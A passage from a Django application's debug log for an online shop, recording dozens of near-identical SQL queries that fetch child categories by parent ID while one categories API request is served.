14:09:46,182 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 14:09:46,185 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 14:09:46,190 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 14:09:46,194 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 14:09:46,197 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 14:09:46,200 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 14:09:46,204 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 14:09:46,210 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 14:09:46,214 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 14:09:46,218 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 14:09:46,222 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 14:09:46,225 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 14:09:46,229 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 14:09:46,236 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 14:09:46,239 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 14:09:46,243 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 14:09:46,246 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 14:09:46,249 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 14:09:46,254 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 14:09:46,258 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 14:09:46,263 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 14:09:46,266 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 14:09:46,271 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 14:09:46,277 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 14:09:46,281 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 14:09:46,285 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 14:09:46,289 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 14:09:46,293 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 14:09:46,297 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 14:09:46,302 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 14:09:46,306 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 14:09:46,310 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 14:09:46,315 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 14:09:46,319 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 14:09:46] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 14:09:51,970 utils 20136 140506422044416 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 14:09:51,980 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 14:09:51,984 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 14:09:51,987 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 14:09:51,991 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-16 14:09:51,993 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 14:09:51,995 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 14:09:51,998 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 14:09:52,002 utils 20136 140506422044416 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 14:09:52,009 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 14:09:52,049 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 14:09:52,053 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 14:09:52,056 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 14:09:52,059 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 14:09:52,064 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 14:09:52,067 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 14:09:52,070 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 14:09:52,074 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 14:09:52,078 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 14:09:52,085 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 14:09:52,089 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 14:09:52,092 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 14:09:52,095 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 14:09:52,098 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 14:09:52,102 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 14:09:52,106 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 14:09:52,109 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 14:09:52,111 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 14:09:52,114 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 14:09:52,117 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 14:09:52,121 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 14:09:52,124 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 14:09:52,126 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 14:09:52,129 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 